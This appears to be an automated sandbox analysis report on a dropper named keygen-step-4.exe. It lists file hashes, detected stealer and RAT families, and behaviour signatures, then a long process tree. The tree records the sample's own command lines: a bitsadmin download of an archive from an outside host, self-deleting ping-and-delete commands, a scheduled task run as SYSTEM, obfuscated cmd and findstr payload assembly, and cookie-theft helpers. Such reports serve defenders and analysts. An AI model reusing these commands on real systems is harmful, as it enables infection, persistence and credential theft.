Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1754s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 60 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 34 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:340
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1036
      • C:\Users\Admin\AppData\Roaming\ftvcbvt
        C:\Users\Admin\AppData\Roaming\ftvcbvt
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:4452
        • C:\Users\Admin\AppData\Roaming\ftvcbvt
          C:\Users\Admin\AppData\Roaming\ftvcbvt
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:5728
      • C:\Users\Admin\AppData\Roaming\ftvcbvt
        C:\Users\Admin\AppData\Roaming\ftvcbvt
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:2208
        • C:\Users\Admin\AppData\Roaming\ftvcbvt
          C:\Users\Admin\AppData\Roaming\ftvcbvt
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:5960
      • C:\Users\Admin\AppData\Roaming\ftvcbvt
        C:\Users\Admin\AppData\Roaming\ftvcbvt
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:3336
        • C:\Users\Admin\AppData\Roaming\ftvcbvt
          C:\Users\Admin\AppData\Roaming\ftvcbvt
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:3104
      • C:\Windows\system32\rundll32.exe
        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
        2⤵
        • Windows security modification
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        PID:1744
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1144
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1396
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1936
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1408
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2708
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2696
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2580
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2448
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2416
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1092
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:860
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2716
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3064
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:644
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4064
                        • C:\Users\Admin\AppData\Local\Temp\is-M2SD0.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-M2SD0.tmp\Install.tmp" /SL5="$40192,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2888
                          • C:\Users\Admin\AppData\Local\Temp\is-DOT30.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-DOT30.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2172
                            • C:\Program Files\Microsoft Office 15\CNQCTBPGLS\ultramediaburner.exe
                              "C:\Program Files\Microsoft Office 15\CNQCTBPGLS\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:200
                              • C:\Users\Admin\AppData\Local\Temp\is-FG2CU.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-FG2CU.tmp\ultramediaburner.tmp" /SL5="$400F4,281924,62464,C:\Program Files\Microsoft Office 15\CNQCTBPGLS\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3364
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:756
                            • C:\Users\Admin\AppData\Local\Temp\34-0f74e-829-029ba-4fd1585b4aea9\Gaesaegevage.exe
                              "C:\Users\Admin\AppData\Local\Temp\34-0f74e-829-029ba-4fd1585b4aea9\Gaesaegevage.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:644
                            • C:\Users\Admin\AppData\Local\Temp\94-4be36-88e-d8b9a-4eddb7e3c3683\Saeraehasadu.exe
                              "C:\Users\Admin\AppData\Local\Temp\94-4be36-88e-d8b9a-4eddb7e3c3683\Saeraehasadu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:3544
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqsnb4jz.fk5\KiffMainE1.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4716
                                • C:\Users\Admin\AppData\Local\Temp\yqsnb4jz.fk5\KiffMainE1.exe
                                  C:\Users\Admin\AppData\Local\Temp\yqsnb4jz.fk5\KiffMainE1.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4840
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yul2bf4m.p1r\001.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4960
                                • C:\Users\Admin\AppData\Local\Temp\yul2bf4m.p1r\001.exe
                                  C:\Users\Admin\AppData\Local\Temp\yul2bf4m.p1r\001.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4376
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqklm2b5.deb\installer.exe /qn CAMPAIGN="654" & exit
                                6⤵
                                  PID:6140
                                  • C:\Users\Admin\AppData\Local\Temp\zqklm2b5.deb\installer.exe
                                    C:\Users\Admin\AppData\Local\Temp\zqklm2b5.deb\installer.exe /qn CAMPAIGN="654"
                                    7⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Enumerates connected drives
                                    • Modifies system certificate store
                                    • Suspicious use of FindShellTrayWindow
                                    PID:4956
                                    • C:\Windows\SysWOW64\msiexec.exe
                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zqklm2b5.deb\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zqklm2b5.deb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620037984 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                      8⤵
                                        PID:5388
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bqtlzfvy.udt\gpooe.exe & exit
                                    6⤵
                                      PID:5004
                                      • C:\Users\Admin\AppData\Local\Temp\bqtlzfvy.udt\gpooe.exe
                                        C:\Users\Admin\AppData\Local\Temp\bqtlzfvy.udt\gpooe.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:5384
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                            PID:5528
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5328
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:684
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2792
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\idfmz0u4.gal\google-game.exe & exit
                                        6⤵
                                          PID:5732
                                          • C:\Users\Admin\AppData\Local\Temp\idfmz0u4.gal\google-game.exe
                                            C:\Users\Admin\AppData\Local\Temp\idfmz0u4.gal\google-game.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5860
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                              8⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              PID:6064
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rslfhunk.nx1\huesaa.exe & exit
                                          6⤵
                                            PID:5828
                                            • C:\Users\Admin\AppData\Local\Temp\rslfhunk.nx1\huesaa.exe
                                              C:\Users\Admin\AppData\Local\Temp\rslfhunk.nx1\huesaa.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5136
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5532
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                  PID:4832
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:3360
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:5956
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rjqhindd.li1\askinstall39.exe & exit
                                              6⤵
                                                PID:5640
                                                • C:\Users\Admin\AppData\Local\Temp\rjqhindd.li1\askinstall39.exe
                                                  C:\Users\Admin\AppData\Local\Temp\rjqhindd.li1\askinstall39.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5752
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                    8⤵
                                                      PID:4776
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im chrome.exe
                                                        9⤵
                                                        • Kills process with taskkill
                                                        PID:5600
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lqwunfq0.szv\setup.exe & exit
                                                  6⤵
                                                    PID:3808
                                                    • C:\Users\Admin\AppData\Local\Temp\lqwunfq0.szv\setup.exe
                                                      C:\Users\Admin\AppData\Local\Temp\lqwunfq0.szv\setup.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5988
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\lqwunfq0.szv\setup.exe"
                                                        8⤵
                                                          PID:5308
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 1.1.1.1 -n 1 -w 3000
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:580
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ecvzqcas.f3v\y1.exe & exit
                                                      6⤵
                                                        PID:5528
                                                        • C:\Users\Admin\AppData\Local\Temp\ecvzqcas.f3v\y1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\ecvzqcas.f3v\y1.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:5648
                                                          • C:\Users\Admin\AppData\Local\Temp\4kDA3YEfrM.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\4kDA3YEfrM.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Modifies system certificate store
                                                            PID:5244
                                                            • C:\Users\Admin\AppData\Roaming\1620297393449.exe
                                                              "C:\Users\Admin\AppData\Roaming\1620297393449.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620297393449.txt"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:1868
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\4kDA3YEfrM.exe"
                                                              9⤵
                                                                PID:5768
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.1 -n 3
                                                                  10⤵
                                                                  • Runs ping.exe
                                                                  PID:5556
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ecvzqcas.f3v\y1.exe"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:1552
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /T 10 /NOBREAK
                                                                9⤵
                                                                • Delays execution with timeout.exe
                                                                PID:5344
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cv4wnnfo.bk0\Setup_v3.exe & exit
                                                          6⤵
                                                            PID:5340
                                                            • C:\Users\Admin\AppData\Local\Temp\cv4wnnfo.bk0\Setup_v3.exe
                                                              C:\Users\Admin\AppData\Local\Temp\cv4wnnfo.bk0\Setup_v3.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4908
                                                              • C:\Windows\SysWOW64\at.exe
                                                                "C:\Windows\System32\at.exe"
                                                                8⤵
                                                                  PID:2104
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                  8⤵
                                                                    PID:5048
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\System32\cmd.exe
                                                                      9⤵
                                                                        PID:4596
                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                          findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                          10⤵
                                                                            PID:2664
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                            Fessura.exe.com Z
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            PID:1896
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                              11⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:4760
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                12⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:684
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                12⤵
                                                                                • Executes dropped EXE
                                                                                PID:5028
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 30
                                                                            10⤵
                                                                            • Runs ping.exe
                                                                            PID:1676
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                        8⤵
                                                                          PID:5956
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1zoluzl5.1du\toolspab1.exe & exit
                                                                      6⤵
                                                                        PID:5576
                                                                        • C:\Users\Admin\AppData\Local\Temp\1zoluzl5.1du\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\1zoluzl5.1du\toolspab1.exe
                                                                          7⤵
                                                                            PID:5008
                                                                            • C:\Users\Admin\AppData\Local\Temp\1zoluzl5.1du\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\1zoluzl5.1du\toolspab1.exe
                                                                              8⤵
                                                                                PID:2628
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ld1ckqi.51l\005.exe & exit
                                                                            6⤵
                                                                              PID:5704
                                                                              • C:\Users\Admin\AppData\Local\Temp\5ld1ckqi.51l\005.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5ld1ckqi.51l\005.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5468
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50kt21pb.ypr\SunLabsPlayer.exe /S & exit
                                                                              6⤵
                                                                                PID:2180
                                                                                • C:\Users\Admin\AppData\Local\Temp\50kt21pb.ypr\SunLabsPlayer.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\50kt21pb.ypr\SunLabsPlayer.exe /S
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in Program Files directory
                                                                                  PID:5476
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:188
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4868
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:5756
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5908
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:2104
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:5204
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                • Checks for any installed AV software in registry
                                                                                                PID:5888
                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                8⤵
                                                                                                • Download via BitsAdmin
                                                                                                PID:4616
                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:3208
                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3824
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:5700
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    9⤵
                                                                                                      PID:5768
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:4708
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspF60B.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:5608
